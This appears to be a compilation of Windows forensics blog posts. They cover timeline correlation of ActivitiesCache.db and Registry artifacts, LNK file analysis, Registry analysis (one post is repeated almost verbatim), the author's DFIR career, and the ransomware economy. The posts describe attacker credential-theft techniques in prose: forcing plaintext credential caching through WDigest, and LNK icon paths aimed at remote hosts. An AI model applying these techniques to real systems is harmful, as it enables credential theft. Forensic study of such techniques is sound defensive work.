I opened RegEdit, navigated to a specific key, and that key was in focus when I closed RegEdit. With respect to the LastKey value, we're aware that's the context of the data...the key that was in focus with RegEdit was closed. What this clearly illustrates is "humanness"...human-based actions occurring and being recorded in these data sources. We can see from the UserAssist data how RegEdit was opened, we can see how long it was open (in this case, ~50 sec or so), and which key was in focus when it was closed. Looked at together, these artifacts provide a clear illustration of human activity.
Here's another example of what correlating the two data sources can look like:
Wed Nov 20 21:11:29 2019 Z
TIMELINE - End Time:C:\Users\harlan\Desktop\WRR.exe
Wed Nov 20 21:10:01 2019 Z
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs - local
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.dat - NTUSER.DAT
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\Folder - local
Wed Nov 20 21:09:45 2019 Z
TIMELINE - Start Time:C:\Users\harlan\Desktop\WRR.exe
REG - [Program Execution] UserAssist - C:\Users\harlan\Desktop\WRR.exe (1)
In this particular case, I'd opened WRR and loaded an NTUSER.DAT file from a folder called "local".
Here's an example of how correlating the two data sources can provide additional insight and context into accessing files:
Wed Nov 20 20:20:56 2019 Z
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.doc - Armor of God.doc
TIMELINE - End Time:Program Files x86\Microsoft Office\Office14\WINWORD.EXE
Wed Nov 20 20:09:29 2019 Z
REG - Word File MRU - C:\Users\harlan\Desktop\Armor of God.doc
REG - Word Place MRU - C:\Users\harlan\Desktop\
Wed Nov 20 20:09:28 2019 Z
TIMELINE - Start Time:Program Files x86\Microsoft Office\Office14\WINWORD.EXE
REG - [Program Execution] UserAssist - {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Microsoft Office\Office14\WINWORD.EXE (5)
In this particular case, I was preparing for Bible study and had a Word document open. The data from the Activity Timeline database showed that MSWord had been opened, but it took data from the NTUSER.DAT hive (RecentDocs and MSOffice plugins) to provide information about which file had been opened. In this case, the data illustrates that I'd had the file open approximately 11 minutes.
I could go on with the examples, but suffice it to say that the ActivitiesCache.db data provides context and validation to data from other sources; in this case, data from the NTUSER.DAT hive associated with user activity. Adding data from other sources, such as Automatic JumpLists, would not only provide additional context, but would be extremely valuable in the face of anti-forensics efforts. Getting a good view of what constitutes artifact clusters will also help us see when elements from those clusters are missing, potentially through deletion efforts.
Further, the correlation of multiple data sources gives us a better view not only of artifact clusters, but also of past activities. As I went through the timeline data, I saw references to files and applications that no longer existed on my system, as well as references to files on external data sources (F:\, G:\, etc.).
Something else I found as a result of this exercise was that the first entry in the database table appears to be dated 20 Jun 2019. Based solely on the data available, it would appear that an update was applied, as I'm also seeing all of the LastWrite times for RecentDocs subkeys set to the same time shortly before the first entry in the database. A quick query via WMIC reveals that a security update was installed on that day, for KB4498523. The finding is reminiscent of what Jason Hale discussed in his blog post regarding shellbags and a Win10 feature update.
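If you want to run the same check on a live system, a minimal sketch (wrapping that WMIC query in Python) might look like the following; note that WMIC is deprecated on current builds, and PowerShell's Get-HotFix returns the same information.

import csv
import io
import subprocess

# List installed updates (hotfixes) so install dates can be lined up against
# Registry key LastWrite times and the first entries in the database.
out = subprocess.run(
    ["wmic", "qfe", "get", "HotFixID,InstalledOn", "/format:csv"],
    capture_output=True, text=True, check=True,
).stdout.replace("\r", "")

# WMIC's CSV output leads with a blank line and a Node column; DictReader
# handles the header row once the blank line is stripped.
for row in csv.DictReader(io.StringIO(out.strip())):
    print(row.get("InstalledOn", ""), row.get("HotFixID", ""))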
Going Deeper
A while back, Mari had written a tool to parse deleted entries from a SQLite database, so I thought I'd give it a shot. I downloaded the CLI version of the tool, and after running it, got a TSV file that I opened up in Excel. There were a total of 630 rows, not all of which seemed to have much data, let alone much data of value. However, many of the rows contained what looked like extensive JSON-formatted data. A number of these contained references to files I'd opened in Notepad++, including the full path to the file, as well as the following:
{"gdprType":"ProductAndServiceUsage","clipboardDataId":"
So, much like other data sources, it appears that deleted items from this database file can provide additional insight and context, as well.
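As a quick triage step, and not a replacement for a dedicated deleted-record parser like Mari's, you can scan the raw database file for strings of interest to see whether fragments like the one above are still present; a minimal sketch:

import re
import sys

# Quick triage: scan the raw database file for printable-ASCII runs and
# report any that contain fragments of interest. This does NOT reconstruct
# deleted SQLite records the way a dedicated parser does; it only shows
# whether strings like the "gdprType" JSON above survive somewhere in the
# file (allocated pages, freelist, or page slack).
PATTERN = re.compile(rb"[ -~]{6,}")

path = sys.argv[1] if len(sys.argv) > 1 else "ActivitiesCache.db"
with open(path, "rb") as f:
    data = f.read()

for match in PATTERN.finditer(data):
    text = match.group().decode("ascii", errors="replace")
    if "gdprType" in text or "clipboardDataId" in text:
        print(f"offset {match.start():#010x}: {text[:120]}")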
Additional Resources:
GroupIB writeup
Salt4n6 writeup
CCLGroup LTD writeup
Journal of Forensic Science paper
Medium.com article - lists descriptive resources, and tools, including Mark McKinnon's Autopsy plugin
PureInfoTech article - disabling the Timeline Activity feature (be sure to look for this being used for anti-forensics, or check the value if you're not finding the ActivitiesCache.db file)
Tools:
kacos2000 - WindowsTimeline
forensicMatt - ActivitiesCacheParser
Eric Z's Tools site
TZWorks - Timeline ActivitiesCache parser
Mari's SQLParser tools
Saturday, November 02, 2019
More Regarding LNK Files
My recent post regarding LNK files got me thinking about other uses of LNK files. That previous post really illustrated how some analysts are following Jesse Kornblum's adage of "using every part of the buffalo", in that they made use of everything (or as close to everything as they could get) that they had available in order to develop a #threatintel picture.
This got me to thinking...taking a step back, how else can LNK files be used?
DFIR Analysis
Some DFIR analysts are aware of the fact that when analyzing Windows systems, you're going to find Windows shortcut/LNK files in a number of locations; for example, the user's desktop, the user's Recent folder, etc. In addition, Automatic JumpList files are OLE structured storage format files, and all but one of the streams follow the LNK file format. So, the file format is widely used on Windows systems, and the location of the file or stream provides some useful context that can also be applied to the content.
LNK files contain a good bit of metadata, as they contain shell items (as do other artifacts, such as shellbags), which are blobs of binary data that describe various objects on Windows systems. In the case of folder objects, specifically, one of the elements found to be embedded within the metadata is the MFT reference number for that folder object. This reference number is comprised of the record number (i.e., location within the MFT), as well as the sequence number (in short, "...this is the nth time this record has been used.")
Okay...so what?
Well, when it comes to artifacts of use, or more specifically, file access, the LNK files created as a result of user activity can remain on the system long after the files and applications with which they're associated have been removed or deleted. Say that you're investigating access to a particular file (by name or folder path), and your goal is to illustrate that the user had knowledge of that file. If the user accessed the file by double-clicking on it, an LNK file will have been created, and that file will persist well beyond the deletion of the target file itself. These artifacts will also persist beyond the removal of the associated application.
This can be useful to us because it gives us something of a historical view of the file system. For example, let's say that, per the MFT, record number 2357, with sequence number 5, points to a folder on the user's desktop called "Personal Stuff". Now, suppose we find an LNK file indicating that the user opened a file that was located in a folder named "Hacker Tools", and the MFT reference number extracted from the LNK file is 2357/4, or 2357/3. This provides us with a view of what the file system used to look like, giving us something of a historical "smear" of the file system.
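For reference, the 64-bit NTFS file reference packs the record number into the lower 48 bits and the sequence number into the upper 16 bits, so splitting a value recovered from a shell item is straightforward; a small helper, with a hypothetical sample value:

# The 64-bit NTFS file reference packs the MFT record number into the lower
# 48 bits and the sequence number into the upper 16 bits; splitting a value
# recovered from a shell item is a simple bit operation.
def split_file_reference(ref: int) -> tuple[int, int]:
    record_number = ref & 0x0000FFFFFFFFFFFF
    sequence_number = ref >> 48
    return record_number, sequence_number

# Hypothetical value, mirroring the 2357/4 example above.
ref = (4 << 48) | 2357
print(split_file_reference(ref))   # -> (2357, 4)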
These LNK files can provide information regarding external devices, as well. The basic shell items are created in the user's shellbags when they use Windows Explorer to navigate folders on an external device, such as a USB thumb drive, USB-connected smartphone, etc. Then, if they open files, shell items are created to populate LNK files pointing to those files.
Adversary Persistence
Adversaries have been observed persisting beyond password updates by modifying the icon filename attribute of an LNK file to point to a resource that they (the adversary) control. If the LNK file is at the root of a directory, then when a user or admin browses to that folder, Windows parses the file and attempts to load the icon from the remote resource, using the user's credentials to authenticate, first via SMB, and then via WebDAV.
Other Ways To Use LNK Files
"Using" LNK files can apply to the adversary, as well as to an analyst (DFIR, intel, etc.). There's this write-up on Kovter, describing how the adversary uses/used LNK files, and there's this BitOfHex blog post describing how to derive intel from LNK files. There's also hexacorn's older blog post regarding the use of hotkeys and LNK files, and this USCERT alert that describes the use of the adversary persistence technique described above (not 'new' or an 'other' use, but placed here as an illustration).
Monday, October 28, 2019
Return of the LNK Files...
I wanted to put something scary together in time for Halloween; I was gonna go with a mullet wig, a la Joe Dirt, or maybe pass out cards with truly scary messages for those of us who are adulting, full time, such as, "...your septic field just rose and flowed down the yard into your porch...", or "...your teenager just got their license and wants to drive home...". You know, truly scary stuff. However, from a #DFIR perspective (and maybe even a little bit of #threatintel), this just seemed a bit more fun and appropriate.
A recent Tweet thread from Nick Carr regarding the use of LNK files in developing threat intel caught my attention. In that thread, Nick mentions learning "about LNK analysis as a DFIR and threat intel tool", and that's something I wholeheartedly agree with. A great deal of value can be derived from LNK files...I've described them as "free money" in the past, due to the fact that an adversary sending an LNK file to a target is essentially giving away information about their infrastructure, particularly when data from LNK files is mapped across multiple campaigns.
Links from Nick's Tweet:
2017 - Fin7
2018 - Cozy Bear
Remember what I said about "multiple campaigns"? If you take a look at the second blog post linked above, you'll see the statement:
The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created.
I'd had an opportunity to dig into the Cozy Bear LNK files a bit myself, as illustrated here, and described here (i.e., in an additional post regarding LNK file toolmarks).
Not long after Nick's tweet, I saw this one from ZwSetInformation, and was able to get a copy of the zipped archive, extract the LNK file and run it through my parser. Not only did I see the individual bits of information exposed by the parser, but looking across the entirety of the information showed me the toolmarks and provided an indication as to how the LNK file had been crafted.
Monday, October 21, 2019
Registry Analysis
Something I've observed over the years is that analysis of the Windows Registry is still a largely misunderstood, misinterpreted, and under-appreciated aspect of analysis of Windows systems.
What is "Registry analysis"? Registry analysis is the observation and interpretation of data or metadata from the Windows Registry, in the context of other data/metadata, also from the Registry or other sources. The correct interpretation of this data can add an unprecedented level of granularity to the context surrounding various events observed during, for example, timeline analysis.
"Registry analysis" is not the parsing and display of individual artifacts from within the Registry; that's "parsing and display". It's also not keyword searching of the Registry; that's "keyword searching". Keyword searches or searches for indicators do not constitute "analysis". I do understand, however, that not all cases require Registry analysis. There are more than a few types of cases out there where keyword searching is all that is necessary, and I get it. Through engaging with other analysts and following up on conversations, I've seen where keyword searches have more than sufficed for a number of types of cases. But that's not the "analysis" we're talking about here.
That is not to say that keyword or indicator searches cannot be used as pivot points into more fully-fledged analysis. Very often, these searches can be an excellent entry point into analysis, allowing the investigator to winnow through vast amounts of data to determine what is initially important.
Analysis techniques that incorporate data and metadata from the Windows Registry into an overall analysis process have allowed me to get a better understanding of the activity derived or extracted from a system; in some cases, to the point of changing the direction of my investigation. Further, I'll be the first to admit that I haven't seen everything there is to see; in fact, within just the past weeks, I've observed activity that I had never seen before, and was able to develop an understanding of what activity led to the observed artifacts. This is not something for which keyword searching would have sufficed, and was only achieved by bringing together multiple data sources in a manner that allowed me to discern context.
Why is this important? Well, for one, Windows keeps changing. Yes, yes, I know, we've heard this before...Windows Vista was a big leap forward (with respect to DFIR artifacts) over XP/2003, and Windows 7 a similar "leap". There were some pretty interesting changes in the short-lived Windows 8/8.1 world, but we've arguably seen a (dare I say, "significant"?) spike in changes just between versions of Windows 10 since that version has been out. The point is that you often can't go a week or two without something new being discovered or observed with respect to the Windows operating system (and specifically the Registry). An analysis process accounts for these changes occurring. For example, one of the approaches I use to winnow down data is to create mini-timelines and overlays; in short, using very specific data sources to create a mini-timeline in order to get a view of the data without all the inherent "noise" of the operating system. I'll create a timeline from a user's Registry hives, incorporating not just time-based data extracted from the hives (i.e., shellbags, UserAssist data, etc.), but also the overall metadata from those hives. This way, I can 'see' a user's activities over time, without having to wade through massive amounts of "noise", such as Windows Updates. And I'll not only be able to develop context, but I'll also see new things, as well.
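To make the "overlay" idea a bit more concrete, here's a minimal sketch that assumes the full timeline has already been parsed into events tagged with their source; the tags themselves are hypothetical.

# Minimal sketch of the mini-timeline/"overlay" idea, using the same
# (timestamp, source, description) tuples as the earlier sketch: filter a
# full timeline down to events derived from a user's Registry hives, so user
# activity can be reviewed without the "noise" of Windows Updates and other
# OS-level events. The source tags would come from whatever parsers built
# the full timeline.
USER_HIVE_SOURCES = {"REG/UserAssist", "REG/RecentDocs", "REG/Shellbags", "REG/HiveMetadata"}

def user_overlay(timeline):
    """Return only the events sourced from the user's hives, in time order."""
    return sorted(event for event in timeline if event[1] in USER_HIVE_SOURCES)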
Speaking of which, let's take a look at the great work Jason Hale has done, as an example. Some of the things we've (I use the universal "we") seen over the years have been Registry key LastWrite times associated with USB devices being universally 'stomped' by updates, as well as Registry hive "backups" no longer being written (by default) to the RegBack folder.
Jason recently pointed out that key LastWrite times associated with MRUs within the shellbags artifacts have been 'stomped' by an update, similar to what was observed with USBStor keys. What impact would this have had on your analysis had this happened 6 months, or 2 years ago? How would this have impacted your findings in a case?
Why is understanding the use and function of the Registry important when it comes to analyzing Windows systems?
Two important aspects of the Windows Registry that I've discussed during many of my speaking engagements have been:
The Windows Registry contains a great deal of configuration information about the system that, if correctly understood and correctly interpreted, can have a significant impact on your analysis.
The Registry contains a lot of configuration settings for the operating system, many set by default, right "out of the box". There are others that can be changed along the way that have an impact on what users of the systems can see and do, as well as what attackers can do. For example, there's a setting that tells the Windows operating system to store credentials in memory, in plain text. Attackers can set this value to "1", wait a week, and come back and dump the credentials from memory, and not have to spend time cracking the passwords. There are settings that tell the Windows shell to not show all user accounts on the Welcome screen, as well as settings that control the functionality of Terminal Services, etc. There are even settings within the Registry that control what users can and cannot access, and how their account functions (i.e., deleted files bypass the Recycle Bin, etc.). Understanding these settings, as well as knowing how to determine when (or if) they changed, can have a significant impact on an investigation.
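As an aside, the plaintext-credentials setting mentioned above isn't named in this post, but it most likely refers to the WDigest UseLogonCredential value; a minimal sketch for checking it on a live system, assuming Python is available on the box:

import winreg

# The value checked here (WDigest UseLogonCredential) is an assumption; the
# post doesn't name the setting, but this is the value most commonly abused
# to force plaintext credentials to be kept in memory (data of 1 = enabled).
KEY_PATH = r"SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"

try:
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY_PATH) as key:
        value, _type = winreg.QueryValueEx(key, "UseLogonCredential")
        print(f"UseLogonCredential = {value}")
except FileNotFoundError:
    # Value (or key) not present; on some older Windows builds, WDigest
    # caching was enabled by default, so the absence of the value is itself
    # worth noting.
    print("UseLogonCredential value not set")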
There are also a number of "autostart" locations within the Registry, keys or values that tell the operating system to start applications with no other interaction from the user beyond booting the system, or logging in. Consider this Threat Research blog post regarding newly-discovered malware, for example. Not only does it include what is reportedly a new persistence mechanism, but it also includes a figure illustrating how code used by the malware is encoded and placed in the Registry for later use. Knowing this, encountering an infected system and incorporating this into our analysis will allow us to discover new information about how the malware operated or was used.
As a side-note, does anyone have an NTUSER.DAT file from a user profile infected with the malware identified in the Juniper Threat Research blog post? I'm curious if the binaryImage32_* values are detected by the RegRipper sizes.pl plugin. Thanks in advance to anyone who can check, or share such a hive file.
The Windows Registry records and maintains a great deal of user activity that, if correctly understood and interpreted, can illustrate "humanness"; that is, provide strong indications of specific, purposeful human activity, as opposed to the automatic effects of the operating system, or of malware.
There are a number of user actions...opening or saving files, launching applications, etc...that are recorded within the Windows Registry, as part of tracking user activity in order to improve the "user experience". The idea is to make Windows more "user friendly", in part by making the more frequently used functionality more easily accessible to the user. The key here is that actions specifically taken by the user can be interpreted as "humanness", as the data recorded is the direct result of a person interacting with the Windows shell, applications, etc. This can provide information to inform an investigation, particularly when knowing when someone was sitting at the keyboard is important, or when discerning whether a user or some automated function accessed data is a critical aspect of an investigation.
Thankz/Shout-Outz
Thankz and shout-outz are due to a number of folks within the #DFIR community who've contributed to the topic through research, creating tools, etc. In no specific order:
Mari DeGrazia
Maxim Suhanov
Jason Hale
Eric Zimmerman
farmerK
I apologize profusely for any names I may have missed, as it was not intentional.
What is "Registry analysis"? Registry analysis is the observation and interpretation of data or metadata from the Windows Registry, in the context of other data/metadata, also from the Registry or other sources. The correct interpretation of this data can add an unprecedented level of granularity to the context surrounding various events observed during, for example, timeline analysis.
"Registry analysis" is not the parsing and display of individual artifacts from within the Registry; that's "parsing and display". It's also not keyword searching of the Registry; that's "keyword searching". Keyword searches or searches for indicators do not constitute "analysis". I do understand, however, that not all cases require Registry analysis. There are more than a few types of cases out there where keyword searching is all that is necessary, and I get it. Through engaging with other analysts and following up on conversations, I've seen where keyword searches have more than sufficed for a number of types of cases. But that's not the "analysis" we're talking about here.
That is not to say that keyword or indicator searches cannot be used as pivot points into more fully-fledged analysis. Very often, these searches can be an excellent entry point into analysis, allowing the investigator to winnow through vast amounts of data to determine what is initially important.
Analysis techniques where I have been able to incorporate data and metadata from the Windows Registry into an overall analysis process, have allowed me to get a better understanding of inherent activity derived or extracted from a system. This has occurred to the point, in some cases, of changing the direction of my investigation. Further, I'll be the first to admit that I haven't seen everything there is to see; in fact, within just the past weeks, I've observed activity that I had never seen before, and was able to develop an understanding of what activity led to the observed artifacts. This is not something for which keyword searching would have sufficed, and was only achieved by bringing together multiple data sources in a manner that allowed me to discern context.
Why is this important? Well, for one, Windows keeps changing. Yes, yes, I know, we've heard this before...Windows Vista was a big leap forward (with respect to DFIR artifacts) over XP/2003, and Windows 7 a similar "leap". There were some pretty interesting changes in the short-lived Windows 8/8.1 world, but we've arguably seen a (dare I say, "significant"?) spike in changes just between versions of Windows 10 since that version has been out. The point is that you can't often go for a week or two before something new with respect to the Windows operating system (and specifically the Registry) is discovered or observed. An analysis process accounts for these changes occurring. For example, one of the approaches I use to winnow down data is to create mini-timelines and overlays; in short, using very specific data sources to create a mini-timeline in order to get a view of the data without all the inherent "noise" of the operating system. I'll create a timeline from a user's Registry hives, incorporating not just time-based data extracted from the hives (i.e., shellbags, UserAssist data, etc.), but also the overall metadata from those hives. This way, I can 'see' a user's activities over time, without having to wade through massive amounts of "noise", such as Windows Updates. And, I'll not only be able to develop context, but I'll also see new things, as well.
Speaking of which, let's take a look at the great work Jason Hale has done, as an example. Some of the things we've (I use the universal "we") seen over the years have been Registry key LastWrite times associated with USB devices being universally 'stomped' by updates, as well as Registry hive "backups" no longer being written (by default) to the RegBack folder.
Jason recently pointed out that key LastWrite times associated with MRUs within the shellbags artifacts have been 'stomped' by an update, similar to what was observed with USBStor keys. What impact would this have had on your analysis had this happened 6 months, or 2 years ago? How would this have impacted your findings in a case?
Why is understanding the use and function of the Registry important when it comes to analyzing Windows systems?
Two important aspects of the Windows Registry that I've discussed during many of my speaking engagements have been:
The Windows Registry contains a great deal of configuration information about the system that, if correctly understood and correctly interpreted, can have a significant impact on your analysis.
The Registry contains a lot of configuration settings for the operating system, many set by default, right "out of the box". There are others that can be changed along the way that have an impact on what users of the systems can see and do, as well as what attackers can do. For example, there's a setting that tells the Windows operating system to store credentials in memory, in plain text. Attackers can set this value to "1", wait a week, and come back and dump the credentials from memory, and not have to spend time cracking the passwords. There are settings that tell the Windows shell to not show all user accounts on the Welcome screen, as well as settings that control the functionality of Terminal Services, etc. There are even settings within the Registry that control what users can and cannot access, and how their account functions (i.e., deleted files bypass the Recycle Bin, etc.). Understanding these settings, as well as knowing how to determine when (or if) they changed, can have a significant impact on an investigation.
There are also a number of "autostart" locations within the Registry, keys or values that tell the operating system to start applications with no other interaction from the user beyond booting the system, or logging in. Consider this Threat Research blog post regarding newly-discovered malware, for example. Not only does it include what is reportedly a new persistence mechanism, but it also includes a figure illustrating how code used by the malware is encoded and placed in the Registry for later use. Knowing this, encountering an infected system and incorporating this into our analysis will allow us to discover new information about how the malware operated or was used.
As a side-note, does anyone have an NTUSER.DAT file from a user profile infected with the malware identified in the Juniper Threat Research blog post? I'm curious if the binaryImage32_* values are detected by the RegRipper sizes.pl plugin. Thanks in advance to anyone who can check, or share such a hive file.
The Windows Registry records and maintains a great deal of user activity that, if correctly understood and interpreted, can illustrate "humanness"; that is, provide strong indications of specific, purposeful human activity, as opposed to the automatic effects of the operating system, or of malware.
There are a number of user actions...opening or saving files, launching applications, etc...that are recorded within the Windows Registry, as part of tracking user activity in order to improve the "user experience". The idea is to make Windows more "user friendly", in part by making the more frequently used functionality more easily accessible to the user. The key here is that actions specifically taken by the user can be interpreted as "humanness", as the data recorded is the direct result of a person interacting with the Windows shell, applications, etc. This can provide information to inform an investigation, particularly when knowing when someone was sitting at the keyboard is important, or when discerning whether a user or some automated function accessed data is a critical aspect of an investigation.
Thankz/Shout-Outz
Thankz and shout-outz are due to a number of folks within the #DFIR community who've contributed to the topic through research, creating tools, etc. In no specific order:
Mari DeGrazia
Maxim Suhanov
Jason Hale
Eric Zimmerman
farmerK
I apologize profusely for any names I may have missed, as it was not intentional.
Friday, September 20, 2019
A Brief History of DFIR Time, pt II
Continuing on from my previous post...
Once I left active duty, one of my first jobs was in an information security role, and I was doing a fair bit of "war dialing", which was fun. The main programs we used at the time were THC Scan and Tone Loc, but in a pinch, you could use the Windows dialer to connect to a number, and listen to the laptop speaker to determine what was on the other end. In most instances, you'd get someone saying, "hello?", but in the few instances where a computer or fax would pick up, we'd note that and move on. The laptops available at the time had built-in modems, as well as PCMCIA slots if you wanted to insert a network (ethernet or, yes, token ring) card. Our laptop bags had phone and ethernet cables, but most companies wouldn't spring for a token ring card because (a) they were expensive and (b) not many customers had token ring networks. Until you went on-site and someone said, "uh...oh, yeah...we use token ring." Of course, no one would say anything during the initial call unless you specifically asked, so that question went on script.
At that time, "computer forensics" was really not well known outside of very small circles, so there wasn't much in the way of "go bags" or kits. The few folks "doing" computer forensics at the time (that I was aware of) were largely former AF OSI enlisted folks, sequestered behind heavy-duty doors with special locks. When you did get a peek inside their wizardly world, the biggest component was a custom-built tower system with extra bays, and everything running on Linux.
At one point early in my career, I worked for a company that was trying to get into the security business, and while I was waiting for a contract, I taught myself Perl because that's a skill that the network engineering folks were looking for in candidates at the time, and I wanted to help out. I never did get a chance to do any really extensive work for them, and I later moved on to a different company, this time performing more extensive (than just war dialing) vulnerability assessments. My boss at the time told me that I would need to run the commercial scanner (ISS's Internet Scanner) for "about 2 to 3 yrs" before I would really understand what it was doing; within 6 months of getting the job, I was writing a tool to replace the commercial product, due to the number of false "hits" we were getting, many due to misinterpretation of the data returned from the query.
For example, there was the AutoAdminLogon value in the Registry; if the commercial tool found the value name, it responded with "AutoAdminLogon value set", even if the data for the value was "0". Further, it never checked for the DefaultUserName or DefaultPassword values. In one instance, the commercial tool determined that 22 systems within a customer's infrastructure had the value 'set', while the customer knew that it was only 1 system for which the value was actually set, and the system would automatically log into the Administrator account upon system boot; the other 21 had the value name, but the data was "0", and there was no username or password in the Registry. They had already found those 21 systems and disabled the functionality through the UI; had we provided the findings from the commercial tool in our report, we would have been remiss, and the customer would have been correct in questioning the rest of the report.
Looking back, I realize that what I'd written was a "threat hunting" tool. We didn't have any software at the time that could perform EDR functions; "visibility" consisted of either sitting at the console and opening Task Manager, or having the admin send a screen capture of Task Manager. However, this tool was accessing systems and getting all sorts of data from them, including things like active modems, running services, applications, etc. So while the tool wasn't able to monitor processes and network connections over time, it was able to get point-in-time data, as well as look at what had occurred in the past on the system. This was the '98-'99 time frame, and as such, a bit before terms like "adversary" and "APT" started to appear in our everyday usage.
I haven't always been in a consulting role. At one point in my career, I took a position as a computer security engineer in an FTE role. During that time, I responded to a couple of internal incidents, and wrote another "threat hunting" tool, albeit on a very limited scale. The tool would access the Windows domain and get a list of all currently running systems; from there, it would access each system and collect the contents of several persistence locations. When I first ran the tool, I'd get a LOT of data back, but over time and with no small amount of investigation, I developed a whitelist of authorized entries. So, after a couple of weeks, I could launch the tool when I headed to a meeting or to lunch, and come back to a list of entries about half a page long. This allowed me to see some issues, sometimes before they became really big issues, as well as identify trends across the infrastructure. For example, there was one system that, because of its location and the fact that it was used by overnight staff, kept popping up with "issues", no matter how many times I cleaned it.
Right around the '99-'00 time frame, I started attending and, more importantly, speaking at security conferences, including BlackHat and DefCon. I had a great deal of experience with public speaking (I had been an instructor while I was on active duty, and classroom audiences were generally 250+ students...) but I was still a little nervous about presenting, because I had this image in my mind of what the audience was going to be like; today, we call this "imposter syndrome". When I was an instructor in the military, I was a more experienced officer (albeit not by much...just a few years), speaking on my profession (i.e., communications). I was teaching new officers the basic skills they needed to learn, using the equipment I was very familiar with. It was an entirely different environment, and here I was speaking to a roomful of people who, I figured, had a great deal more experience in the industry than I did. And in some cases, that was a correct assumption, albeit not in all cases. What I found when presenting on a solution I'd found to a problem I had was that there were others who had a similar problem, but had not yet arrived at a solution. This realization really changed things for me, it really impacted my perspective, and it subsequently led to me submitting more and more.
For all of you out there who are thinking about submitting a presentation, and that thought scares you to death, ask yourself why that is. More than likely, it's because you're thinking that you'll be judged. And you're right, that's what people do. However, the next time you're attending a speaking event, sit in the back of the room and just watch what everyone else is doing. There will be lots of things they're doing...but one of them won't be paying attention, not for many folks, anyway. Case in point, just a little over a month and a half ago, I gave a presentation, and at the beginning of the presentation, I stated...twice...when copies of the slides would be available. The first question at the end of the presentation was...well, get three guesses, and the first two don't count.
My point is that a great deal of the anxiety that you feel when thinking about submitting to or just speaking at a conference is pretty normal, but it's also largely self-inflicted. Don't let it paralyze you; instead, use it to fuel your development. Use that energy to check the details of your presentation one more time, to rehearse one more time, to seek out feedback on the content one more time.
And don't be afraid of people asking questions, because that fear will prevent you from actually listening to the question. Remember, for all intents and purposes, you are the expert on the topic, and you're presenting your view, based on your perspective. Yes, there are going to be other perspectives; don't be so overwhelmed by the fear of a question that you don't actually listen to the question. I've been asked, "...did you look at...", as well as the more pointed, "...why didn't you consider...", and by listening to the question, I was able to get beyond that "imposter syndrome" anxiety and actually address the question.
One question I received back in the early 2000's was at an HTCIA International conference in Fairfax, VA...I was presenting on Registry analysis and someone in the audience, with a laptop in front of them, asked me, "what happens when you do X?" I had a sudden flash of inspiration, and I turned the question around...I asked the person asking the question to try what he'd suggested, and tell us all what he found. No, what he'd asked wasn't something I'd considered, but it did seem like a good idea...so rather than going back and forth on the specifics, I thought it would be a great idea to have them try it, in hopes of getting others to see that rather than going to someone else for answers, there are a great number of things we can try on our own, and discover for ourselves.
In 2005, Cory Altheide and I wrote the first published paper on tracking USB devices across Windows systems. It's fascinating to look back and see not only how far we've come with this topic, particularly given how much the Windows operating system has changed over that time, but to also see how many times the paper is referenced. In most cases, the articles that reference our work are peer-reviewed articles, ones for which a literature search is a requirement. Even so, it's pretty cool to see how many times that article is referenced. Yes, there are a lot of those in the industry (as with any other industry) who "do" research without first performing a literature search, but that search is a pretty hard-and-fast requirement for academic, peer-reviewed papers, and it is pretty fascinating to see the number of references to our paper.
As digital forensics and incident response grew into something around which a service could be built and sold to customers, we started to develop "go kits", and there were lots of discussions and arguments on the Internet regarding what went into those kits. Prior to the advent of enterprise-wide response capabilities (i.e., deploying an EDR monitoring tool, etc.), I had a Pelican case that weighed 65 lbs (I know because I had to check it in every time I flew out...), and contained two MacBook laptops, running Windows XP, two sets of hardware write-blockers, a wide assortment of cables, as well as hard copies of documentation. I also had a laptop in my backpack with backup copies of all documentation, as well as hard copy of all pertinent phone numbers; if EVERYTHING failed, including my cell phone (notice I didn't say "smart phone", because we didn't have those at the time) battery, I still needed to be able to contact my boss, the customer, etc. If I lost everything else, I could still get to a store, purchase a new laptop, put the tools I used on it (from a CD...remember those?), and get to work.
With the enterprise reach of EDR tools that we have at our disposal, there's a shift in how the DFIR industry reacts and provides services, but we still have a lot of our original or age-old issues, due to the fact that as the industry has progressed, we've never really dealt with those issues. Things like documentation and sharing of information or threat intel, specificity of language, correct data interpretation, not interpreting artifacts in isolation from other artifacts, etc. These are things that we need to improve upon, as an industry.
Even so, it's been pretty fascinating to me to see how, in some cases, DFIR work has really progressed, particularly with respect to enterprise-wide response. There's quick/timely deployment of visibility (i.e., EDR) from a remote location, data is collected and analyzed, and then answers are provided, very often before the next available flight to the location departs. It's a brave new world out there regarding what can be done to respond to incidents.
Monday, September 09, 2019
The Ransomware Economy
There's no doubt about it...cybercrime, and especially ransomware, is an entire economy in and of itself.
Don't believe me?
Read through this ProPublica article, not just once, but a couple of times. And take notes. Then go back and read the notes. Here's what I got from the article:
- Organizations are looking to insurance policies to defray the costs of incidents. Rather than investing in prevention, detection, and response, they're accepting (to some degree) that these incidents are going to happen, and seeking to establish a means to minimize their financial risk. Hence, insurance policies.
- A ransomware incident occurs, and the policy kicks in. Depending upon how the policy was set up, and what it covers, the deductible may be much less than the ransom. Financial risk minimized.
Not long ago, a fellow responder shared that many of the ransomware cases he works include an element of data exfiltration. A recent 60Minutes segment on ransomware includes a similar statement; if you watch until 9:50 in the segment, you'll see mention of the bad guy further extorting an organization by threatening to leak their "internal data".
Let's look at some of the reporting on ransomware, such as this The Conversation article. At one point in the article, we see the statement:
Ransomware usually spreads via phishing emails or links...
Perhaps "usually", yes, but not always. The 60Minutes segment mentioned the Samsam ransomware; during the first half of 2016, these guys were seen using the publicly available JexBoss exploit to gain access to organizations through JBoss CMS servers. At that time, the average time between initial access to the organization and deploying the ransomware was 4 months. In 2017, in some cases, they switched to Terminal Services servers, gaining access via easily-guessed passwords. Yes, some ransomware (some Ryuk incidents, for example) incidents begin with a phishing email, and then branch off into deploying remote access tools, internal reconnaissance, possibly privilege escalation, networking mapping, and finally, deploying the ransomware.
Another quote from the article:
Offenders will do their homework before launching an attack, in order to create the most severe disruption they possibly can.
